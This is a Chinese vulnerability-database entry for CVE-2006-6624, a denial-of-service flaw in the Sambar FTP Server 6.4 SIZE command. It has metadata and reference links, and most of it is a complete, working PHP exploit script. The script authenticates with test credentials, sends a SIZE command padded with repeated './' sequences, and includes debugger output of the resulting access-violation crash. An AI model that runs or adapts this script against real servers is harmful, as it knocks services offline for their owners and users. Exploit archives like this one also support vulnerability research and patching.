Sambar FTP Server SIZE命令远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111776 漏洞类型 其他
发布时间 2006-12-15 更新时间 2006-12-18
CVE编号 CVE-2006-6624 CNNVD-ID CNNVD-200612-387
漏洞平台 Windows CVSS评分 4.0
|漏洞来源
https://www.exploit-db.com/exploits/2934
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-387
|漏洞详情
SambarServer6.4中的FTP服务器存在远程拒绝服务漏洞。远程认证用户可以通过在SIZE命令中的一个长"./"序列来发起拒绝服务攻击(应用系统崩溃)。
|漏洞EXP
<?php

# Sambar FTP Server 6.4 SIZE Denial Of Service
# by rgod
# mail: retrog at alice dot it
# site: http://retrogod.altervista.org

# tested on WinXP sp2

error_reporting(E_ALL);

$service_port = getservbyname('ftp', 'tcp');
$address = gethostbyname('192.168.1.3');

$user="test";
$pass="test";

$junk="";
for ($i=1; $i<=160; $i++){
    $junk.="./";
}

$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
   echo "socket_create() failed:\n reason: " . socket_strerror($socket) . "\n";
} else {
   echo "OK.\n";
}

$result = socket_connect($socket, $address, $service_port);
if ($result < 0) {
   echo "socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n";
} else {
   echo "OK.\n";
}

$out=socket_read($socket, 240);
echo $out;

$in = "USER ".$user."\r\n";
socket_write($socket, $in, strlen ($in));

$out=socket_read($socket, 80);
echo $out;

$in = "PASS ".$pass."\r\n";
socket_write($socket, $in, strlen ($in));

$out=socket_read($socket, 80);
echo $out;

$in = "SIZE ".$junk."\r\n";
socket_write($socket, $in, strlen ($in));

socket_close($socket);

/*20:13:17.600  pid=0C50 tid=0148  EXCEPTION (first-chance)
              ----------------------------------------------------------------
              Exception C0000005 (ACCESS_VIOLATION reading [2E2F2E7B])
              ----------------------------------------------------------------
              EAX=2E2F2E2F: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              ECX=00000170: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EDX=012CE7F0: 35 35 30 20 43 61 6E 27-74 20 61 63 63 65 73 73
              ESP=012CE7C0: F0 E7 2C 01 FD FF FF FF-01 00 00 00 00 00 00 00
              EBP=012CE900: 2F 2E 2F 2E 2F 2E 2F 2E-2F 2E 2F 2E 2F 2E 2F 2E
              ESI=00A0E3C0: 00 00 00 00 28 60 E2 00-B0 C0 D3 00 78 A6 28 10
              EDI=00A016A0: 01 00 00 00 01 00 00 00-0A 00 00 00 B6 0B 00 00
              EIP=1008DB22: 8B 48 4C 51 8B 55 08 8B-42 58 50 E8 EE AD 18 00
                            --> MOV ECX,[EAX+4C]
              ----------------------------------------------------------------

20:13:17.610  pid=0C50 tid=0148  EXCEPTION (unhandled)
              ----------------------------------------------------------------
              Exception C0000005 (ACCESS_VIOLATION reading [2E2F2E7B])
              ----------------------------------------------------------------
              EAX=2E2F2E2F: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              ECX=00000170: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EDX=012CE7F0: 35 35 30 20 43 61 6E 27-74 20 61 63 63 65 73 73
              ESP=012CE7C0: F0 E7 2C 01 FD FF FF FF-01 00 00 00 00 00 00 00
              EBP=012CE900: 2F 2E 2F 2E 2F 2E 2F 2E-2F 2E 2F 2E 2F 2E 2F 2E
              ESI=00A0E3C0: 00 00 00 00 28 60 E2 00-B0 C0 D3 00 78 A6 28 10
              EDI=00A016A0: 01 00 00 00 01 00 00 00-0A 00 00 00 B6 0B 00 00
              EIP=1008DB22: 8B 48 4C 51 8B 55 08 8B-42 58 50 E8 EE AD 18 00
                            --> MOV ECX,[EAX+4C]
              ----------------------------------------------------------------

20:13:17.610  pid=0C50 tid=0148  Thread exited with code 3221225477
20:13:17.610  pid=0C50 tid=0D40  Thread exited with code 3221225477
20:13:17.610  pid=0C50 tid=08A0  Thread exited with code 3221225477
20:13:17.610  pid=0C50 tid=0900  Thread exited with code 3221225477
20:13:17.610  pid=0C50 tid=0C44  Thread exited with code 3221225477
20:13:17.610  pid=0C50 tid=0750  Thread exited with code 3221225477
20:13:17.610  pid=0C50 tid=0244  Thread exited with code 3221225477
20:13:17.610  pid=0C50 tid=04F0  Thread exited with code 3221225477
20:13:17.610  pid=0C50 tid=0AC4  Thread exited with code 3221225477
20:13:17.610  pid=0C50 tid=0870  Thread exited with code 3221225477
20:13:17.610  pid=0C50 tid=01F0  Thread exited with code 3221225477
20:13:17.610  pid=0C50 tid=0114  Thread exited with code 3221225477
20:13:17.610  pid=0C50 tid=0ABC  Process exited with code 3221225477
*/
?>

# milw0rm.com [2006-12-15]
|参考资料

来源:MISC
链接:http://www.securityfocus.com/data/vulnerabilities/exploits/21617.php
来源:BID
名称:21617
链接:http://www.securityfocus.com/bid/21617
来源:XF
名称:sambar-size-dos(30920)
链接:http://xforce.iss.net/xforce/xfdb/30920
来源:VUPEN
名称:ADV-2006-5041
链接:http://www.frsirt.com/english/advisories/2006/5041
来源:SECTRACK
名称:1017393
链接:http://securitytracker.com/id?1017393
来源:SECUNIA
名称:23376
链接:http://secunia.com/advisories/23376
来源:MILW0RM
名称:2934
链接:http://milw0rm.com/exploits/2934